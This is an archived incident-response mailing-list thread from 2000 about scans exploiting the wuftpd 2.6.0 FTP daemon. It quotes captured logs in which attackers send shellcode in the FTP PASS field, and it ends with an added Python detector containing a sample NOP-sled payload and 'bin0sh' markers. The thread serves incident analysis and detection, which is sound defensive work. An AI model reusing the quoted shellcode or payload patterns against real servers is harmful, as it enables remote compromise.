Security Incidents mailing list archives

Re: New or old FTP exploit?


From: Fredrik Ostergren <fredrik.ostergren () FREEBOX COM>
Date: Wed, 9 Aug 2000 20:56:22 -0000

Hi!
I believe it's the "new" wuftpd 2.6.0(1) exploit. I had the same attacks on a network and noticed the exact login functions using a sniffer; that "bin0sh1" is common for the "new" wuftpd exploit.

/ Fredrik Ostergren.

Our /16 has been scanned at least two times from different foreign addresses during the last weeks with an exploit that seems to be the same. On both occasions, the connections are to port 21 with the would-be intruder trying to log in as "USER ftp" and "PASS long-string-with-nops-and-shellcode-in-it". From one of our users, I got the following log saved by sniffit:

> USER ftp
> USER ftp
> PASS
1À1Û1É°
F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^ˆFf¹ÿÿ°'̀1À^°=̀1À1ۍ^‰
C1ÉþÉ1À^°̀þÉuó1ÀˆF ^°=̀þ°0þȈF1ÀˆF‰v‰F‰óNV°
̀1À1Û°̀èÿÿÿÿÿÿ0bin0sh1..11
> PASS
1À1Û1É°
F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^ˆFf¹ÿÿ°'̀1À^°=̀1À1ۍ^‰
C1ÉþÉ1À^°̀þÉuó1ÀˆF ^°=̀þ°0þȈF1ÀˆF‰v‰F‰óNV°
̀1À1Û°̀èÿÿÿÿÿÿ0bin0sh1..11

Another user sent me this:

> Jul 22 05:47:16 yyyyy ftpd[11650]: ANONYMOUS FTP LOGIN FROM xxxxxxxxxxxxxxxxxxxx [xxx.xxx.xx.xx],
> 1À1Û1É°
F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^^AˆF^Df¹ÿ^A°'̀1À^^A°=̀1À1ۍ^^H‰
C^B1ÉþÉ1À^^H°^L̀þÉuó1ÀˆF^I^^H°=̀þ^N°0þȈF^D1ÀˆF^G‰v^H‰
F^L‰óN^HV^L°^K̀1À1Û°^Àèÿÿÿ0bin0sh1..11
> Jul 22 05:47:27 yyyyy ftpd[11650]: FTP session closed Jul 22 07:48:13

Could somebody please tell me if this is an old exploit for some FTP daemon, or a new exploit?

We have seen attacks coming from:
 200.255.45.90  ppp50.cruiser.com.br
 212.69.228.245 Legend Internet Ltd

--
Kent Engström, Linköping University Incident Response Team
kent () unit liu se
abuse () liu se
+46 13 28 1744

UNIT, Linköping University; SE-581 83 LINKÖPING; SWEDEN
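A defender-side check for the login pattern described in this thread (an anonymous "USER ftp" followed by a PASS argument stuffed with NOPs, shellcode bytes and the "bin0sh1" string), written as an added example that is not part of the original mails. The session lines, the 0x90 NOP sled and the length threshold are constructed assumptions; the only page-derived value is the "bin0sh" marker.

```python
from typing import Dict, List

# Constructed FTP control-channel capture, one client command per line,
# in the spirit of the sniffit output quoted in the thread. The PASS
# payload is a stand-in: a NOP sled, a few raw opcode bytes, then the
# "0bin0sh1" string seen at the tail of the real capture.
SAMPLE_SESSION: List[bytes] = [
    b"USER ftp",
    b"USER ftp",
    b"PASS " + b"\x90" * 40 + b"\x31\xc0\x31\xdb" + b"0bin0sh1",
    b"USER alice",
    b"PASS correct-horse-battery",
]

# "bin0sh" is the self-patching "/bin/sh" string visible in the thread's
# payload; "/bin/sh" covers payloads that carry it unpatched.
MARKERS = (b"bin0sh", b"/bin/sh")
MAX_PASS_LEN = 64        # assumed site threshold, not from the page
MIN_NOP_SLED = 8         # assumed: 8+ consecutive 0x90 bytes
MAX_NONPRINT = 4         # assumed: a few non-ASCII bytes are tolerated


def suspicious_pass(arg: bytes) -> List[str]:
    """Return the reasons a PASS argument looks like an overflow payload
    rather than a password; an empty list means it looks benign."""
    reasons: List[str] = []
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if nonprint > MAX_NONPRINT:
        reasons.append(f"{nonprint} non-printable bytes")
    if len(arg) > MAX_PASS_LEN:
        reasons.append(f"length {len(arg)} > {MAX_PASS_LEN}")
    if b"\x90" * MIN_NOP_SLED in arg:
        reasons.append("NOP sled")
    for marker in MARKERS:
        if marker in arg:
            reasons.append(f"marker {marker!r}")
    return reasons


def scan_session(lines: List[bytes]) -> List[Dict[str, object]]:
    """Walk a captured session and report every PASS that trips a check,
    noting whether it followed an anonymous 'USER ftp'."""
    findings: List[Dict[str, object]] = []
    last_user = b""
    for idx, line in enumerate(lines):
        cmd, _, arg = line.partition(b" ")
        if cmd.upper() == b"USER":
            last_user = arg.lower()
        elif cmd.upper() == b"PASS" and (reasons := suspicious_pass(arg)):
            findings.append({"line": idx, "anonymous": last_user == b"ftp",
                             "reasons": reasons})
    return findings
```

Running `scan_session(SAMPLE_SESSION)` flags only the constructed shellcode PASS (line 2) and marks it as following an anonymous login; the ordinary user password passes clean.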

